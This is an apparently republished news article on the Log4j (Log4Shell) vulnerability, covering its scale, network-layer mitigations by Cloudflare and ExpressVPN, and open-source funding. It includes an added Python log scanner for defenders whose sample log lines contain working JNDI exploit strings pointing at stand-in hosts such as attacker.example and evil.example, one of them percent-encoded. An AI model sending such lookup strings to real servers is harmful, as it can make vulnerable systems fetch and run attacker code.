WhatsNew2Day

Log4j has been patched, but the exploits are just getting started

Peter Membrey, chief architect of ExpressVPN, vividly recalls seeing the news about the Log4j vulnerability online.

“Once I saw how you could exploit it, it was horrifying,” Membrey says. “It’s like one of those disaster movies that feature a nuclear power plant: they notice it’s going to melt down, but they can’t stop it. You know what’s coming, but there are very limited things you can do.”

Since the vulnerability was discovered last week, the cybersecurity world has accelerated to identify vulnerable applications, detect potential attacks and mitigate exploits, however possible. Nevertheless, serious hacks that take advantage of the exploit are almost certain.

So far, researchers have observed attackers use the Log4j vulnerability to install ransomware on honeypot servers — machines that have been deliberately made vulnerable to detect new threats. A cybersecurity company reported that almost half of the corporate networks it was monitoring had seen attempts to exploit the vulnerability. The CEO of Cloudflare, a website and network security provider, announced early on that the threat was so great that the company would roll out firewall protection to all customers, including those who had not paid for it. But concrete news about exploitation in the wild remains scarce, probably because victims do not know, or are not yet willing to publicly acknowledge, that their systems have been hacked.

What is certain is that the magnitude of the vulnerability is enormous. A list of affected software, compiled by the Cybersecurity and Infrastructure Security Agency (CISA) — and limited to enterprise software platforms only — runs to over 500 items at the time of going to press. A list of all affected applications would undoubtedly add up to many thousands more.

Some of the names on the list will be known to the public (Amazon, IBM, Microsoft), but some of the most alarming problems have come with software that remains behind the scenes. Manufacturers such as Broadcom, Red Hat and VMware create software that enterprise customers build businesses on top of, effectively spreading the vulnerability at a core infrastructure level of many companies. This makes the process of identifying and eliminating vulnerabilities all the more difficult, even after a patch for the affected library has been released.

Even by the standards of high-profile vulnerabilities, Log4Shell reaches an unusually large portion of the Internet. It is a reflection of the fact that the Java programming language is widely used in business software, and for Java software, the Log4j library is extremely common.

“I ran searches of our database to see every customer using Log4j in one of their applications,” said Jeremy Katz, co-founder of Tidelift, a company that helps other organizations manage dependencies on open source software. “And the answer was: each of them has applications written in Java.”

The discovery of an easily exploitable bug in a primarily business-oriented language is part of what analysts call an “almost perfect storm” around the Log4j vulnerability. Any company could use multiple programs containing the vulnerable library – in some cases with multiple versions within one application.

“Java has been around for so many years and is used so heavily within companies, especially large ones,” said Cloudflare CTO John Graham-Cumming. “This is a big moment for people who manage software within companies, and they will go through updates and fixes as soon as possible.”

Given the circumstances, “as soon as possible” is a very relative term. Software updates for organizations such as banks, hospitals, or government agencies are generally performed on the scale of weeks and months, not days; typically, updates require several rounds of development, authorization, and testing before making their way into a live application.

In the meantime, mitigations that can be pushed out fast provide a critical intermediate step, saving valuable time as businesses large and small alike scramble to identify vulnerabilities and deploy updates. That’s where network-layer fixes play a key role: Since malware programs communicate with their operators over the Internet, measures that restrict inbound and outbound web traffic can provide a workaround to mitigate the exploit’s effects.

Cloudflare was one organization that moved quickly, Graham-Cumming explained, adding new firewall rules that blocked HTTP requests containing strings characteristic of the Log4j attack code. ExpressVPN, too, modified its product to protect against Log4Shell, updating VPN rules to automatically block all outgoing traffic on the ports used by LDAP — a protocol that the exploit uses to retrieve resources from external URLs and download them to a vulnerable machine.
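The two network-layer mitigations described above, as an added example that is not code from Cloudflare, ExpressVPN or the article: a request-log scanner that flags the JNDI lookup syntax the exploit relies on (the firewall-rule approach), an egress check that drops outbound connections to the standard LDAP ports 389 and 636 (the VPN-rule approach), and a correlation step that tells an incident responder whether a flagged request was actually followed by a callback. The log lines, hostnames and connection records are constructed for the example.

```python
import re
from typing import Dict, Iterable, List, Tuple
from urllib.parse import unquote

# Log4j lookup syntax the exploit uses: "${jndi:<scheme>://<host>[:port]/...}".
# Matched case-insensitively on URL-decoded text, since requests often arrive percent-encoded.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*://(?P<host>[^/\s:}]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)
LDAP_PORTS = {389, 636}                      # standard LDAP / LDAPS ports (assumed egress policy)
DEFAULT_PORT = {"ldap": 389, "ldaps": 636}   # port implied when the lookup URL omits one

# Constructed sample data: one benign request, one lookup in the User-Agent, one percent-encoded in the query.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example:389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:03 +0000] "GET /?x=%24%7Bjndi%3Aldaps%3A%2F%2Fevil.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]
SAMPLE_CONNECTIONS = [  # constructed outbound-connection records from the application host
    {"src": "app-01", "dst_host": "attacker.example", "dst_port": 389},
    {"src": "app-01", "dst_host": "updates.example", "dst_port": 443},
]


def find_jndi_lookups(log_lines: Iterable[str]) -> List[Dict]:
    """Flag request-log lines carrying a JNDI lookup; returns one record per hit (1-based line numbers)."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = JNDI_LOOKUP.search(unquote(line))
        if m:
            scheme = m.group("scheme").lower()
            port = int(m.group("port")) if m.group("port") else DEFAULT_PORT.get(scheme)
            hits.append({"line": n, "scheme": scheme, "host": m.group("host"), "port": port})
    return hits


def blocked_egress(connections: Iterable[Dict]) -> List[Dict]:
    """Return the outbound connections an LDAP-port egress rule would drop."""
    return [c for c in connections if c["dst_port"] in LDAP_PORTS]


def correlate_callbacks(hits: List[Dict], connections: List[Dict]) -> List[Tuple[int, str, int]]:
    """Pair each flagged request with an outbound connection to the host and port it named.
    A match means the lookup was evaluated by the application, not merely received."""
    return [(h["line"], c["dst_host"], c["dst_port"])
            for h in hits for c in connections
            if c["dst_host"] == h["host"] and c["dst_port"] == h["port"]]


if __name__ == "__main__":
    hits = find_jndi_lookups(SAMPLE_LOG)
    print("flagged requests:", hits)
    print("dropped by egress rule:", blocked_egress(SAMPLE_CONNECTIONS))
    print("confirmed callbacks:", correlate_callbacks(hits, SAMPLE_CONNECTIONS))
```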

“If a customer gets infected, we’ve already seen scanners as a malicious payload, so they can start scanning the internet and infect other people,” Membrey says. “We wanted to put a limit on that, not just for the sake of our customers, but for everyone — kind of like with Covid and vaccines.”

These changes usually happen faster because they happen on firewall or VPN company servers and require little (if any) action from the end user. In other words, an outdated software application could still get a decent level of protection from an updated VPN, although it’s no substitute for proper patching.

Unfortunately, given the severity of the vulnerability, some systems will be compromised even if quick fixes are implemented. And it can take a long time – even years – for the effects to be fully felt.

“Advanced attackers will exploit the vulnerability, set up a persistence mechanism, and then be misled,” said Daniel Clayton, vice president of global cybersecurity services at Bitdefender. “In two years we will hear about major breaches and then learn that they were breached two years ago.”

The bug in Log4j emphasizes once again the need, and the challenge, of adequately funding open source projects. (A vast amount of tech infrastructure might as well depend on “a project that some random person in Nebraska has been thanklessly maintaining since 2003,” as an eternally relevant XKCD comic puts it.) Bloomberg reported earlier this week that many of the developers involved in the race to develop a patch for the Log4j library were unpaid volunteers, despite the software’s global use in business applications.

One of the last vulnerabilities to shake the internet, Heartbleed, was similarly caused by a bug in a widely used open source library, OpenSSL. After that bug, tech companies like Google, Microsoft and Facebook pledged to increase their funding for open source projects critical to the Internet’s infrastructure. But in the wake of the Log4j fallout, it’s clear that dependency management remains a serious security problem – and one we’re not close to solving.

“If you look at most of the big hacks that have happened over the years, it’s normally not something very sophisticated that big companies undo,” Clayton says. “It’s something that hasn’t been patched.”
